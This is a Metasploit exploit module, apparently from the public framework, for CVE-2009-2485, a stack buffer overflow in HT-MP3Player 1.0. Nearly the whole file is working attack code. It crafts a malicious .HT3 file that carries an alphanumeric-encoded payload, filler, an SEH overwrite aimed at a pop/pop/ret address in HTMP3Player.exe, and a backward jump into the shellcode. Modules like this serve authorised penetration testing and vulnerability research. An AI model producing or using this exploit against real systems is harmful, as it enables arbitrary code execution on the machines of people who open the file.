modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HT-MP3Player 1.0.
Arbitrary code execution could occur when parsing a specially crafted
.HT3 file.
NOTE: The player installation does not register the file type to be
handled. Therefore, a user must take extra steps to load this file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hack4love <hack4love[at]hotmail.com>',
'His0k4',
'jduck',
],
'References' =>
[
[ 'CVE', '2009-2485' ],
[ 'OSVDB', '55449' ],
[ 'EDB', '9034' ],
[ 'EDB', '9038' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'AllowWin32SEH' => true
},
'Payload' =>
{
'Space' => 4108,
'DisableNops' => 'True',
# input restriction: UTF-8!
'BadChars' => [0,0x0a,0x0d,*(0x80..0xcf)].pack("C*"),
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'StackAdjustment' => -8500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'HT-MP3Player 1.0',
{
'Ret' => 0x00406cff, # pop/pop/ret @ HTMP3Player.exe
}
],
],
'Privileged' => false,
'DisclosureDate' => '2009-06-29',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ht3']),
])
end
def exploit
# payload first
bof = payload.encoded
# filler
bof << rand_text_alphanumeric(payload_space - bof.length)
# NOTE: the nul smashes a nul, oh no!
sehrec = generate_seh_record(target.ret)
# jmp -4108 (depends on target addr ending with 0xff)
sehrec[0,4] = "\xe9\xef\xef\xff"
bof << sehrec
# crash reading from offset 4096 (put bad addr here)
bof[4096,4] = [0xf0f0f0f0].pack('V')
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(bof)
end
end